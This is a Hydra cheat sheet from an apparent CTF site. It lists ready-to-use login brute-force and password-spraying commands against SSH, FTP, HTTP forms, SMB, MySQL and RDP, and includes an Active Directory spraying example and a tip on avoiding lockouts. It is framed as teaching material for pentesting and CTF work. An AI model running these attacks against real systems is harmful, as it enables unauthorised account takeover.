Superior CTF

1. INTRODUCTION

Hydra is a fast and powerful login brute-force tool.

It supports protocols such as SSH, FTP, HTTP(S), SMB, RDP, MySQL, SMTP, VNC, POP3, and many more.

It is commonly used in:

bash

Pentesting

bash

CTF brute-force challenges

bash

Credential auditing

2. BASIC SYNTAX

Hydra syntax patterns:

Single username + single password:

bash

hydra -l USER -p PASS protocol://target

Username list + password list:

bash

hydra -L users.txt -P passwords.txt protocol://target

Flags:

bash

-l : single username

bash

-L : username list

bash

-p : single password

bash

-P : password list

3. SSH BRUTE FORCE

Common SSH brute force:

bash

hydra -L users.txt -P passwords.txt ssh://192.168.1.10

Single user brute force:

bash

hydra -l admin -P rockyou.txt ssh://10.10.10.5

Use when SSH is open and weak credentials are suspected.

4. FTP BRUTE FORCE

Brute force FTP login:

bash

hydra -L users.txt -P passwords.txt ftp://target.com

FTP often uses weak or default credentials in CTFs.

5. HTTP POST FORM BRUTE FORCE

Classic POST brute-force:

bash

hydra -L users.txt -P passes.txt 192.168.1.20 http-post-form \

"/login.php:user=^USER^&pass=^PASS^:F=invalid"

Notes:

bash

^USER^ and ^PASS^ placeholders are replaced on each attempt.

bash

F=invalid tells Hydra what response indicates a failed login.

6. HTTP GET FORM BRUTE FORCE

GET request brute force:

bash

hydra -L users.txt -P passes.txt target.com http-get-form \

"/login?u=^USER^&p=^PASS^:F=incorrect"

7. SMB BRUTE FORCE

Brute force Windows SMB logins:

bash

hydra -L users.txt -P passes.txt smb://10.10.10.15

8. MYSQL BRUTE FORCE

Brute force MySQL credentials:

bash

hydra -l root -P passwords.txt mysql://192.168.1.50

9. RDP BRUTE FORCE

Brute force Windows Remote Desktop:

bash

hydra -L users.txt -P passwords.txt rdp://10.10.10.25

10. SPEED AND THREAD CONTROL

Increase brute-force speed using threads:

bash

hydra -L users.txt -P passes.txt -t 32 ssh://10.10.10.5

11. VERBOSE MODE & OUTPUT

Show every request:

bash

hydra -vV ...

Save output to file:

bash

hydra -L users.txt -P passes.txt ssh://10.10.10.5 -vV -o hydra_results.txt

12. PASSWORD SPRAYING

One password, many users:

bash

hydra -L users.txt -p Password123 ssh://10.10.10.5

Useful for avoiding account lockouts.

13. CTF & PENTEST EXAMPLES

Weak SSH credentials:

bash

hydra -l root -P rockyou.txt ssh://10.10.10.5

Web login brute force:

bash

hydra -L users.txt -P passes.txt 10.10.10.8 http-post-form \

"/index.php:username=^USER^&password=^PASS^:F=Login Failed"

FTP brute force:

bash

hydra -L users.txt -P passwords.txt ftp://target.com

Active Directory password spraying:

bash

hydra -L employees.txt -p Winter2024 rdp://10.0.0.15

HYDRA — Practical Guide

1. INTRODUCTION

2. BASIC SYNTAX

3. SSH BRUTE FORCE

4. FTP BRUTE FORCE

5. HTTP POST FORM BRUTE FORCE

6. HTTP GET FORM BRUTE FORCE

7. SMB BRUTE FORCE

8. MYSQL BRUTE FORCE

9. RDP BRUTE FORCE

10. SPEED AND THREAD CONTROL

11. VERBOSE MODE & OUTPUT

12. PASSWORD SPRAYING

13. CTF & PENTEST EXAMPLES